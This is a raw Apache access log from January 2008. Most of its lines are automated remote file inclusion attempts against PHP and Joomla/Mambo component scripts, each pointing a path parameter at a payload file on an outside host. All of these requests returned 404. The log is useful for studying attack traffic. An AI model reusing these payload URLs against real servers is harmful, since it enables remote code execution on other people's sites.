216.69.176.40 - - [22/Jan/2008:18:48:07 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.201.254.239 - - [22/Jan/2008:18:48:36 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.173.130.137 - - [22/Jan/2008:18:50:11 -0800] "GET /logs/access_071218.log/classes/adodbt/sql.php?classes_dir=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.173.130.137 - - [22/Jan/2008:18:50:11 -0800] "GET /logs/classes/adodbt/sql.php?classes_dir=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.22.126 - - [22/Jan/2008:18:50:11 -0800] "GET /tmp/?D=D HTTP/1.0" 200 1660 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
208.53.183.183 - - [22/Jan/2008:18:50:17 -0800] "GET /logs/access_071225.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://ccking.110mb.com/date.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.173.130.137 - - [22/Jan/2008:18:50:22 -0800] "GET /logs/access_080101.log/classes/adodbt/sql.php?classes_dir=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.199.102.117 - - [22/Jan/2008:18:52:17 -0800] "GET /logs/access.log//smallaxe-0.3.1/inc/linkbar.php?cfile=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.199.102.117 - - [22/Jan/2008:18:52:18 -0800] "GET //smallaxe-0.3.1/inc/linkbar.php?cfile=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.199.102.117 - - [22/Jan/2008:18:52:18 -0800] "GET /logs//smallaxe-0.3.1/inc/linkbar.php?cfile=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.27.33 - - [22/Jan/2008:18:52:36 -0800] "GET /logs/access_070714.log HTTP/1.0" 200 51386 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
209.208.81.132 - - [22/Jan/2008:18:53:05 -0800] "GET /logs/access_071222.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.naimaa.com/templates/r00t/safeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.208.81.132 - - [22/Jan/2008:18:53:05 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.naimaa.com/templates/r00t/safeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.208.81.132 - - [22/Jan/2008:18:53:05 -0800] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.naimaa.com/templates/r00t/safeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.208.81.132 - - [22/Jan/2008:18:53:20 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.naimaa.com/templates/r00t/safeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.19.200 - - [22/Jan/2008:18:54:19 -0800] "GET / HTTP/1.0" 200 2946 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
69.10.135.176 - - [22/Jan/2008:18:54:22 -0800] "GET /logs/access_071126.log//modules/vwar/admin/admin.php?vwar_root=http://www.moas.com.br/images/www.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.135.176 - - [22/Jan/2008:18:54:23 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.moas.com.br/images/www.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.135.176 - - [22/Jan/2008:18:54:23 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.moas.com.br/images/www.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.193.236.107 - - [22/Jan/2008:18:54:34 -0800] "GET /logs/access.log/tools/send_reminders.php?noSet=0&includedir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.193.236.107 - - [22/Jan/2008:18:54:35 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.193.236.107 - - [22/Jan/2008:18:54:41 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.22.126 - - [22/Jan/2008:18:54:48 -0800] "GET / HTTP/1.0" 200 2946 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
208.201.254.239 - - [22/Jan/2008:18:54:51 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.201.254.239 - - [22/Jan/2008:18:54:51 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.193.236.107 - - [22/Jan/2008:18:55:17 -0800] "GET /logs/access.log/tools/send_reminders.php?noSet=0&includedir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.193.236.107 - - [22/Jan/2008:18:55:18 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.193.236.107 - - [22/Jan/2008:18:55:18 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
84.244.146.6 - - [22/Jan/2008:18:56:00 -0800] "GET /logs/access_071230.log//appserv/main.php?appserv_root=http://www.freewebtown.com/vibeblog/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.244.146.6 - - [22/Jan/2008:18:56:00 -0800] "GET //appserv/main.php?appserv_root=http://www.freewebtown.com/vibeblog/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.244.146.6 - - [22/Jan/2008:18:56:00 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.freewebtown.com/vibeblog/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.193.236.107 - - [22/Jan/2008:18:56:26 -0800] "GET /logs/access.log/tools/send_reminders.php?noSet=0&includedir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.193.236.107 - - [22/Jan/2008:18:56:26 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.193.236.107 - - [22/Jan/2008:18:56:26 -0800] "GET /logs/access.log/tools/send_reminders.php?noSet=0&includedir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.193.236.107 - - [22/Jan/2008:18:56:26 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
121.156.105.11 - - [22/Jan/2008:18:56:26 -0800] "GET /logs/access.log/tools/send_reminders.php?noSet=0&includedir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.193.236.107 - - [22/Jan/2008:18:56:26 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.193.236.107 - - [22/Jan/2008:18:56:27 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
121.156.105.11 - - [22/Jan/2008:18:56:27 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
121.156.105.11 - - [22/Jan/2008:18:56:28 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.90.135.132 - - [22/Jan/2008:18:56:59 -0800] "GET /logs/access_071126.log//modules/vwar/admin/admin.php?vwar_root=http://paginas.terra.com.br/lazer/xexmox/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.90.135.132 - - [22/Jan/2008:18:56:59 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://paginas.terra.com.br/lazer/xexmox/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.90.135.132 - - [22/Jan/2008:18:56:59 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://paginas.terra.com.br/lazer/xexmox/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.208.81.132 - - [22/Jan/2008:18:57:03 -0800] "GET /logs/access.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.naimaa.com/templates/r00t/safeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
217.160.214.167 - - [22/Jan/2008:18:57:19 -0800] "GET /logs/access.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.laila.jp/item_pics/d3rf/testi.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
217.160.214.167 - - [22/Jan/2008:18:57:19 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.laila.jp/item_pics/d3rf/testi.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
217.160.214.167 - - [22/Jan/2008:18:57:19 -0800] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.laila.jp/item_pics/d3rf/testi.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.193.236.107 - - [22/Jan/2008:18:58:02 -0800] "GET /logs/access_071224.log/tools/send_reminders.php?noSet=0&includedir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.193.236.107 - - [22/Jan/2008:18:58:02 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.193.236.107 - - [22/Jan/2008:18:58:03 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
121.156.105.11 - - [22/Jan/2008:18:58:08 -0800] "GET /logs/access_071224.log/tools/send_reminders.php?noSet=0&includedir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
121.156.105.11 - - [22/Jan/2008:18:58:08 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
121.156.105.11 - - [22/Jan/2008:18:58:09 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.193.236.107 - - [22/Jan/2008:18:58:32 -0800] "GET /logs/access_080101.log/tools/send_reminders.php?noSet=0&includedir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.193.236.107 - - [22/Jan/2008:18:58:39 -0800] "GET /logs/access_080101.log/tools/send_reminders.php?noSet=0&includedir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
121.156.105.11 - - [22/Jan/2008:18:58:59 -0800] "GET /logs/access_080101.log/tools/send_reminders.php?noSet=0&includedir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
121.156.105.11 - - [22/Jan/2008:18:58:59 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
121.156.105.11 - - [22/Jan/2008:18:59:00 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
121.156.105.11 - - [22/Jan/2008:18:59:04 -0800] "GET /logs/access_080101.log/tools/send_reminders.php?noSet=0&includedir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
121.156.105.11 - - [22/Jan/2008:18:59:04 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
121.156.105.11 - - [22/Jan/2008:18:59:05 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.69.176.40 - - [22/Jan/2008:18:59:17 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.193.236.107 - - [22/Jan/2008:18:59:20 -0800] "GET /logs/access_071228.log/tools/send_reminders.php?noSet=0&includedir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
121.156.105.11 - - [22/Jan/2008:19:00:25 -0800] "GET /logs/access_071230.log/tools/send_reminders.php?noSet=0&includedir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
121.156.105.11 - - [22/Jan/2008:19:00:36 -0800] "GET /logs/access_071230.log/tools/send_reminders.php?noSet=0&includedir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
121.156.105.11 - - [22/Jan/2008:19:01:03 -0800] "GET /logs/access_071230.log/tools/send_reminders.php?noSet=0&includedir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.55.156.153 - - [22/Jan/2008:19:01:08 -0800] "GET /logs/modules/xfsection/modify.php?dir_module=http://fantastiki.net/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
72.55.156.153 - - [22/Jan/2008:19:01:08 -0800] "GET /modules/xfsection/modify.php?dir_module=http://fantastiki.net/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
80.199.102.117 - - [22/Jan/2008:19:02:34 -0800] "GET /logs/access_071230.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.199.102.117 - - [22/Jan/2008:19:02:35 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.199.102.117 - - [22/Jan/2008:19:02:35 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.199.102.117 - - [22/Jan/2008:19:04:09 -0800] "GET /logs/access_071229.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.208.16.29 - - [22/Jan/2008:19:04:25 -0800] "GET /logs/access_071230.log//modules/vwar/admin/admin.php?vwar_root=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
74.208.16.29 - - [22/Jan/2008:19:04:25 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
74.208.16.29 - - [22/Jan/2008:19:04:25 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
62.193.236.107 - - [22/Jan/2008:19:04:38 -0800] "GET /logs/access_071230.log/tools/send_reminders.php?noSet=0&includedir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.208.16.29 - - [22/Jan/2008:19:05:13 -0800] "GET /logs/access_071225.log//modules/vwar/admin/admin.php?vwar_root=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
121.156.105.11 - - [22/Jan/2008:19:05:29 -0800] "GET /logs/access.log/tools/send_reminders.php?noSet=0&includedir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
121.156.105.11 - - [22/Jan/2008:19:05:30 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
121.156.105.11 - - [22/Jan/2008:19:05:30 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.119.158.50 - - [22/Jan/2008:19:06:12 -0800] "GET /logs/access_071230.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://holynova.net/administrator/components/com_comprofiler/safe2.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
85.119.158.50 - - [22/Jan/2008:19:06:13 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://holynova.net/administrator/components/com_comprofiler/safe2.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
85.119.158.50 - - [22/Jan/2008:19:06:13 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://holynova.net/administrator/components/com_comprofiler/safe2.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
66.249.70.19 - - [22/Jan/2008:19:07:24 -0800] "GET /logs/access_080121.log HTTP/1.1" 200 717411 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
206.127.78.84 - - [22/Jan/2008:19:07:31 -0800] "GET /logs/access_071126.log//modules/vwar/admin/admin.php?vwar_root=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.127.78.84 - - [22/Jan/2008:19:07:32 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.127.78.84 - - [22/Jan/2008:19:07:32 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.127.78.84 - - [22/Jan/2008:19:07:45 -0800] "GET /logs/access_071126.log//modules/vwar/admin/admin.php?vwar_root=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.127.78.84 - - [22/Jan/2008:19:07:45 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.127.78.84 - - [22/Jan/2008:19:07:45 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.119.158.50 - - [22/Jan/2008:19:08:39 -0800] "GET /logs/access_071214.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://holynova.net/administrator/components/com_comprofiler/safe2.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
121.156.105.11 - - [22/Jan/2008:19:09:06 -0800] "GET /logs/access_071230.log/tools/send_reminders.php?noSet=0&includedir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
91.121.69.26 - - [22/Jan/2008:19:11:37 -0800] "GET /logs/index.php?option=com_google_maps&category=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/boo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
91.121.69.26 - - [22/Jan/2008:19:11:39 -0800] "GET /index.php?option=com_google_maps&category=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/boo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
212.143.172.133 - - [22/Jan/2008:19:13:36 -0800] "GET /logs/access.log/tools/send_reminders.php?noSet=0&includedir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.143.172.133 - - [22/Jan/2008:19:13:36 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.143.172.133 - - [22/Jan/2008:19:13:37 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.249.70.19 - - [22/Jan/2008:19:13:45 -0800] "GET /logs/access_080119.log HTTP/1.1" 200 618239 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.249.70.19 - - [22/Jan/2008:19:14:16 -0800] "GET /logs/access_080122.log HTTP/1.1" 200 590794 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
74.6.20.143 - - [22/Jan/2008:19:14:19 -0800] "GET /logs/access_071008.log HTTP/1.0" 200 53442 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
81.169.187.243 - - [22/Jan/2008:19:17:42 -0800] "GET /logs/access_071224.log//modules/4nAlbum/public/displayCategory.php?basepath=http://aers.t35.com/vennom.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
81.169.187.243 - - [22/Jan/2008:19:17:42 -0800] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://aers.t35.com/vennom.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
81.169.187.243 - - [22/Jan/2008:19:17:43 -0800] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://aers.t35.com/vennom.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
212.227.118.54 - - [22/Jan/2008:19:18:17 -0800] "GET /logs/access_071224.log//modules/4nAlbum/public/displayCategory.php?basepath=http://aers.t35.com/vennom.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
212.227.118.54 - - [22/Jan/2008:19:18:18 -0800] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://aers.t35.com/vennom.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
212.227.118.54 - - [22/Jan/2008:19:18:18 -0800] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://aers.t35.com/vennom.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
212.143.172.133 - - [22/Jan/2008:19:19:00 -0800] "GET /logs/access_071230.log/tools/send_reminders.php?noSet=0&includedir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.111.193.18 - - [22/Jan/2008:19:23:06 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.seucu.us/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
207.111.193.18 - - [22/Jan/2008:19:23:06 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.seucu.us/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
212.143.172.133 - - [22/Jan/2008:19:26:23 -0800] "GET /logs/access.log/tools/send_reminders.php?noSet=0&includedir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.143.172.133 - - [22/Jan/2008:19:26:23 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
